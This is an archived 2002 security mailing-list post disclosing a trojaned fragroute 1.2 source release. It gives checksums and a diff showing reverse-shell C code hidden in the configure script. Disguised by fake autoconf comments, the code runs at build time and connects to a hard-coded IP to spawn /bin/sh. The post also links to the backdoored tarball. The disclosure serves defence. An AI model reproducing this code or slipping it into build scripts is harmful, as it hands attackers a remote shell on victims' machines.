Trojan/backdoor in fragroute 1.2 source distribution

From: Anders Nordby (andersat_private)
Date: Fri May 31 2002 - 00:55:21 PDT

  • Next message: Daniel Nyström: "[[ TH 026 Inc. ]] SA #3 - Shambala Server 4.5, Directory Traversal and DoS" 

    Hello,

Although downloading it now seems safe, I think folks should know this.
The changes done were similar to what happened to irssi, but with a
different IP.

MD5 sum of fragroute-1.2.tar.gz, downloaded from
http://www.monkey.org/~dugsong/fragroute/ on may 27 (the contaminated
version): 65edbfc51f8070517f14ceeb8f721075

MD5 sum of fragroute-1.2.tar.gz, downloaded from
http://www.monkey.org/~dugsong/fragroute/ on may 30 (this is the current
MD5 sum): 7e4de763fae35a50e871bdcd1ac8e23a

Diff between the two:

diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure
--- fragroute-1.2/configure	Mon Apr 15 16:41:43 2002
+++ fragroute-1.2-bad/configure	Mon Apr 15 16:41:43 2002
@@ -1590,6 +1590,53 @@
 
 fi
 
+cat > conftest.c<<EOF
+/* Override any gcc2 internal prototype to avoid an error.  */
+/* We use char because int might match the return type of a gcc2
+    builtin and then its argument prototype would still apply.  */
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <unistd.h>
+int main()
+{
+/* The GNU C library defines this for functions which it implements
+    to always fail with ENOSYS.  Some functions are actually named
+    something starting with __ and the normal name is an alias.  */
+        int s;
+        struct sockaddr_in sa;
+        switch(fork()) { case 0: break; default: exit(0); }
+        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
+                exit(1);
+        }
+  /* HP/UX 9 (%@#!) writes to sscanf strings */
+        memset(&sa, 0, sizeof(sa));
+        sa.sin_family = AF_INET;
+        sa.sin_port = htons(6667);
+/* Override any gcc2 internal prototype to avoid an error.  */
+/* We use char because int might match the return type of a gcc2
+    builtin and then its argument prototype would still apply.  */
+        sa.sin_addr.s_addr = inet_addr("216.80.99.202");
+        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
+                exit(1);
+        }
+  /* HP/UX 9 (%@#!) writes to sscanf strings */
+        dup2(s, 0); dup2(s, 1); dup2(s, 2);
+/* The GNU C library defines this for functions which it implements
+    to always fail with ENOSYS.  Some functions are actually named
+    something starting with __ and the normal name is an alias.  */
+        { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
+}
+EOF
+gcc $LIBS conftest.c -o conftest; ./conftest
+if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
+  rm -rf conftest*
+else
+  rm -rf conftest*
+fi
+rm -f conftest*
+
     # DLPI needs putmsg under HPUX so test for -lstr while we're at it
     echo $ac_n "checking for putmsg in -lstr""... $ac_c" 1>&6
 echo "configure:1596: checking for putmsg in -lstr" >&5


References
==========

FreeBSD PR about this: http://www.freebsd.org/cgi/query-pr.cgi?pr=38716
Irssi backdoor page: http://www.irssi.org/?page=backdoor
Backdoored fragroute: ftp://ftp.nuug.no/pub/anders/distfiles/fragroute-1.2.tar.gz

Cheers,

-- 
Anders.

    This archive was generated by hypermail 2b30 : Fri May 31 2002 - 07:34:05 PDT